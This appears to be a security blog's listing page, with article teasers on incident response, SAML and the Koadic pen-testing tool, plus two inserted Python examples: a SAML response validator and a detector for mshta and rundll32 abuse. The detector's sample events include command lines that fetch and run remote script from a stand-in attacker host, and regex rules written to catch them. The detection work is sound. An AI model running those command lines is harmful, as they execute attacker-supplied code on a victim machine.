For IT Pros Only

Let's be clear: this is for IT people. Not because IT people are better looking and drive cooler cars than the general populace (which is true: most IT departments look like extras from the set of The Fast and the Furious), but because unless you're familiar with things like the dark blackness that grips your soul when you discover that two NICs on your network have the same MAC address, you probably aren't going to appreciate this at all.

Data Security

What is Incident Response? A 6-Step Plan

“We don’t rise to the level of our expectations, we fall to the level of our training.” – Archilochus

Incident response is the discipline of containing, cleaning up and recovering when you discover a cybersecurity breach. You might also see these breaches referred to as IT incidents, security incidents, or computer incidents, but whatever you call them, you need a plan and a team dedicated to managing the incident and minimizing the damage and cost of…
Data Security

What is a Distributed Denial of Service (DDoS) Attack?

A Distributed Denial of Service (DDoS) attack is an attempt to knock a web server or online system offline by flooding it with more traffic than it can handle. DDoS attacks can be simple mischief, revenge, or hacktivism, and can range from a minor annoyance to long-term downtime resulting in loss of business. Attackers hit GitHub with a DDoS attack that peaked at 1.35 terabits per second (Tbps) in February 2018. That’s a massive attack, and it’s doubtful that it will…
Data Security

The Top Skills of Fortune 100 CISOs

The role of CISO is constantly expanding and evolving with the growing awareness of cyber attacks. As cyber attacks increase in frequency and sophistication, organizations are beginning to treat security as a business priority and the role of CISO has become more critical. Companies need to look beyond basic technical expertise and the necessary leadership skills and instead look for someone who also understands their organization’s operations and can express IT security priorities…
Data Security

What is the Colorado Privacy Law?

On September 1, 2018, the Colorado Protections for Consumer Data Privacy law, HB 18-1128, goes into effect. A bipartisan group introduced HB 18-1128 in January, and after the usual negotiations, the Legislature passed it unanimously. The new privacy provisions are part of the Colorado Consumer Protection Act (“CCPA”), in a continued effort to protect personal data. Colorado is getting the message. Data privacy and security are important, and companies need to be held…
Data Security

Do Executives and Cybersecurity Pros Agree on Today’s Biggest Cyber Threa...

Breaches cost companies billions, erode trust and can have a long-lasting negative impact on a company’s brand. With so much at stake, we wondered: are C-Suite executives aligned with their security and IT pros when it comes to cybersecurity? We asked 345 C-Suite executives and cybersecurity/IT pros in the U.S., U.K., France and Germany some questions to find out. Dreading Data Loss: What are Executives’ Top 3 Cybersecurity Concerns? Corporate executives share the same concerns…
Data Security

How to Turn Cybersecurity Jargon into a Language Everyone in Your Office Ca...

Explaining how cybersecurity affects an entire organization can be complex. The field is filled with jargon and buzzwords that can hinder understanding for those outside of IT. What’s more, everyone in an organization views cybersecurity through a different lens, depending on what their role in the company is. In order to explain important aspects of cybersecurity and how they affect your company, you must be able to communicate without using jargon that business stakeholders may…
IT Pros

What is SAML and How Does it Work?

Security Assertion Markup Language (SAML) is an open standard that lets an identity provider (IdP) pass signed authentication and attribute assertions to a service provider (SP), which then decides what the user may do. What that jargon means is that you can use one set of credentials to log into many different websites. It’s much simpler to manage one login per user than it is to manage separate logins to email, customer relationship management (CRM) software, Active Directory, etc. SAML transactions use Extensible Markup Language (XML) for…
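The service-provider side of that exchange, as an added example that is not code from the article: a Python routine that takes a constructed SAML 2.0 Response (embedded below, not captured from a real IdP) and applies the checks an SP must make before trusting the identity inside it, namely success status, exactly one assertion, a signature element, the expected issuer, the NotBefore/NotOnOrAfter window, the audience restriction, and a NameID. The entity IDs and the placeholder ds:Signature are assumptions for the demo; real deployments verify the XML signature with the IdP's certificate using an XMLDSig library, which the standard library does not provide.

```python
import xml.etree.ElementTree as ET
from datetime import datetime, timezone

NS = {
    "samlp": "urn:oasis:names:tc:SAML:2.0:protocol",
    "saml": "urn:oasis:names:tc:SAML:2.0:assertion",
    "ds": "http://www.w3.org/2000/09/xmldsig#",
}

# Hypothetical entity IDs for the identity provider and the service provider.
IDP_ENTITY_ID = "https://idp.example.com/metadata"
SP_ENTITY_ID = "https://sp.example.com/metadata"

# Constructed SAML Response, not captured from a real IdP. The ds:Signature element is a
# stand-in: a real SP verifies the XML signature before trusting anything else here.
SAMPLE_RESPONSE = """<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
    xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"
    ID="_r1" Version="2.0" IssueInstant="2018-07-01T12:00:00Z"
    Destination="https://sp.example.com/saml/acs">
  <saml:Issuer>https://idp.example.com/metadata</saml:Issuer>
  <samlp:Status><samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/></samlp:Status>
  <saml:Assertion ID="_a1" Version="2.0" IssueInstant="2018-07-01T12:00:00Z">
    <saml:Issuer>https://idp.example.com/metadata</saml:Issuer>
    <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
      <ds:SignatureValue>placeholder</ds:SignatureValue>
    </ds:Signature>
    <saml:Subject>
      <saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">alice@example.com</saml:NameID>
    </saml:Subject>
    <saml:Conditions NotBefore="2018-07-01T11:59:30Z" NotOnOrAfter="2018-07-01T12:05:00Z">
      <saml:AudienceRestriction>
        <saml:Audience>https://sp.example.com/metadata</saml:Audience>
      </saml:AudienceRestriction>
    </saml:Conditions>
    <saml:AuthnStatement AuthnInstant="2018-07-01T11:59:55Z"/>
    <saml:AttributeStatement>
      <saml:Attribute Name="groups"><saml:AttributeValue>crm-users</saml:AttributeValue></saml:Attribute>
    </saml:AttributeStatement>
  </saml:Assertion>
</samlp:Response>"""

# Clock values for the demo: inside, and then after, the assertion's validity window.
NOW_OK = datetime(2018, 7, 1, 12, 0, 30, tzinfo=timezone.utc)
NOW_LATE = datetime(2018, 7, 1, 12, 6, 0, tzinfo=timezone.utc)


class SamlError(ValueError):
    """Raised when the response must not be accepted."""


def parse_time(value):
    # SAML timestamps are UTC xsd:dateTime values; fractional seconds are optional.
    value = value.rstrip("Z")
    fmt = "%Y-%m-%dT%H:%M:%S.%f" if "." in value else "%Y-%m-%dT%H:%M:%S"
    return datetime.strptime(value, fmt).replace(tzinfo=timezone.utc)


def validate_response(xml_text, expected_issuer, expected_audience, now):
    """Return the subject and attributes of a Response the SP may trust, else raise."""
    # For XML from the network, prefer defusedxml over the stdlib parser in production.
    root = ET.fromstring(xml_text)
    status = root.find("samlp:Status/samlp:StatusCode", NS)
    if status is None or not status.get("Value", "").endswith(":Success"):
        raise SamlError("IdP did not report success")
    assertions = root.findall("saml:Assertion", NS)
    if len(assertions) != 1:
        raise SamlError("expected exactly one Assertion")
    assertion = assertions[0]
    # Presence check only; the cryptographic verification needs an XMLDSig library.
    if assertion.find("ds:Signature", NS) is None:
        raise SamlError("assertion is not signed")
    if assertion.findtext("saml:Issuer", namespaces=NS) != expected_issuer:
        raise SamlError("unexpected issuer")
    conditions = assertion.find("saml:Conditions", NS)
    if conditions is None or not (conditions.get("NotBefore") and conditions.get("NotOnOrAfter")):
        raise SamlError("assertion has no validity window")
    not_before = parse_time(conditions.get("NotBefore"))
    not_on_or_after = parse_time(conditions.get("NotOnOrAfter"))
    if not (not_before <= now < not_on_or_after):
        raise SamlError("assertion outside its validity window")
    audiences = [a.text for a in conditions.findall("saml:AudienceRestriction/saml:Audience", NS)]
    if expected_audience not in audiences:
        raise SamlError("assertion was issued for a different service provider")
    name_id = assertion.findtext("saml:Subject/saml:NameID", namespaces=NS)
    if not name_id:
        raise SamlError("assertion has no NameID")
    attributes = {}
    for attr in assertion.findall("saml:AttributeStatement/saml:Attribute", NS):
        attributes[attr.get("Name")] = [v.text for v in attr.findall("saml:AttributeValue", NS)]
    return {"name_id": name_id, "attributes": attributes}


def outcome(xml_text, now, issuer=IDP_ENTITY_ID, audience=SP_ENTITY_ID):
    """Wrap validate_response so callers get ('accept', claims) or ('reject', reason)."""
    try:
        return "accept", validate_response(xml_text, issuer, audience, now)
    except SamlError as exc:
        return "reject", str(exc)


if __name__ == "__main__":
    print(outcome(SAMPLE_RESPONSE, NOW_OK))
    print(outcome(SAMPLE_RESPONSE, NOW_LATE))
```

The audience check is the one most often skipped: an assertion the IdP minted for the CRM must not log the same user into the email gateway, even though the issuer, signature and time window are all valid. The short validity window (a few minutes) limits replay, and rejecting responses with anything other than exactly one assertion closes off the usual assertion-wrapping tricks before any signature logic runs.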
Data Security

Data Security: Definition, Explanation and Guide

What is Data Security? Data security is the process of protecting files, databases, and accounts on a network by adopting a set of controls, applications, and techniques that identify the relative importance of different datasets, their sensitivity and their regulatory compliance requirements, and then applying appropriate protections to secure those resources. Like other approaches such as perimeter security, file security or user behavior analytics, data security is not the be-all and end-all of a security practice.…
IT Pros

Koadic: Pen Testing, Pivoting, & JavaScripting, Part II

Mshta and rundll32, the Windows binaries that Koadic leverages, have long been known to hackers. If you take a peek at MITRE’s ATT&CK knowledge base, you’ll see that rundll32 has been the basis for attacks stretching back years. Pen-testing tools such as Koadic have formalized established hacking wisdom, thereby helping IT people (and bloggers) to understand threats and improve defenses. I’ll add that it makes sense to also take a deeper dive into Koadic’s design to…
Data Security

5 Cybersecurity Concerns of Industry Insiders

We asked professionals attending two of the world’s biggest cybersecurity conferences – RSA in San Francisco and Infosecurity in London – five questions to gauge their opinions and attitudes about current issues and concerns on everything from GDPR and the Facebook data scandal to cloud security. Read on to discover what we found after surveying folks who live and breathe security every day. Question 1: Should the U.S. and/or individual states standardize data privacy laws…
IT Pros

CISM vs. CISSP Certification: Which One is Best for You?

It’s a perfect time to be CISM or CISSP certified, or have any cybersecurity certification: according to Gartner, the unemployment rate for cybersecurity professionals is zero – as in there isn’t an unemployment rate. In fact, there are more jobs than qualified candidates, and the job postings stay open for a long time. CISM and CISSP are two of the most highly regarded certifications for cybersecurity leaders and practitioners, but their requirements aren’t trivial. Both…
IT Pros

Koadic: LoL Malware Meets Python-Based Command and Control (C2) Server, Par...

In my epic series on Windows binaries that have dual uses (talkin’ to you, rundll32 and mshta) I showed how hackers can stealthily download and launch remote script-based malware. I also mentioned that pen testers have been actively exploring the living-off-the-land (LoL) approach for post-exploitation. Enter Koadic. I learned about Koadic sort of by accident. For kicks, I decided to assemble a keyword combination of “javascript rundll32 exploitation” to see what would show…
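Both Koadic teasers above make the same defensive point: rundll32 and mshta are legitimate Windows binaries, so the detection signal is not the process itself but what it is asked to run. The Python below is an added example, not code from the articles or from the Koadic project, and runs over constructed Sysmon-style process-creation events (not real telemetry). It flags mshta.exe launched with a URL or an inline javascript:/vbscript: payload, and rundll32.exe whose arguments contain a script protocol handler, a remote URL, or a first argument that is not a DLL-like module, then raises the priority when the parent is an Office application. The rule names, event layout and IP addresses are assumptions for the demo.

```python
import ntpath
import re

# Constructed Sysmon-style process-creation events (Image, CommandLine, ParentImage).
# None of these are real captures; 10.0.0.5 stands in for an attacker-controlled host.
EVENTS = [
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r'rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL "C:\Windows\System32\ncpa.cpl"',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'mshta.exe "C:\Program Files\Vendor\setup.hta"',
     "ParentImage": r"C:\Program Files\Vendor\setup.exe"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe http://10.0.0.5:9999/stage",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://10.0.0.5:9999/x")',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe url.dll,FileProtocolHandler https://intranet.example.com/",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

SCRIPT_PROTO = re.compile(r"\b(?:javascript|vbscript):", re.I)
REMOTE_URL = re.compile(r"\bhttps?://", re.I)
# First argument after rundll32.exe: either a quoted string or a run of non-whitespace.
RUNDLL32_MODULE = re.compile(r'rundll32(?:\.exe)?"?\s+("[^"]*"|\S+)', re.I)
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
DLL_LIKE = (".dll", ".cpl", ".ocx", ".ax", ".drv")


def rundll32_module(cmdline):
    """Module rundll32 was asked to load: the first argument, before any ',Export'."""
    match = RUNDLL32_MODULE.search(cmdline)
    if not match:
        return ""
    return match.group(1).strip('"').split(",")[0]


def classify(event):
    """Return the list of rule names the event triggers (empty list if benign)."""
    image = ntpath.basename(event["Image"]).lower()
    cmd = event["CommandLine"]
    hits = []
    if image == "mshta.exe":
        if REMOTE_URL.search(cmd):
            hits.append("mshta_remote_url")
        if SCRIPT_PROTO.search(cmd):
            hits.append("mshta_inline_script")
    elif image == "rundll32.exe":
        if SCRIPT_PROTO.search(cmd):
            hits.append("rundll32_script_protocol")
        if REMOTE_URL.search(cmd):
            hits.append("rundll32_remote_url")
        module = rundll32_module(cmd)
        if module and not module.lower().endswith(DLL_LIKE):
            hits.append("rundll32_nonstandard_module")
    # Office spawning a LoL binary is a classic phishing-to-execution chain.
    if hits and ntpath.basename(event["ParentImage"]).lower() in OFFICE_PARENTS:
        hits.append("office_parent")
    return hits


def scan(events):
    """Pair each suspicious event's index with the rules it matched."""
    results = []
    for index, event in enumerate(events):
        hits = classify(event)
        if hits:
            results.append((index, hits))
    return results


if __name__ == "__main__":
    for index, hits in scan(EVENTS):
        print(index, EVENTS[index]["CommandLine"][:60], hits)
```

The last sample event is deliberately ambiguous: rundll32 with url.dll,FileProtocolHandler and an intranet URL is a known living-off-the-land launcher but also something help-desk scripts do, so it lands in the results with a single low-value rule and belongs on an allowlist once triaged. The javascript: handler case, by contrast, trips three rules at once and has no routine administrative use.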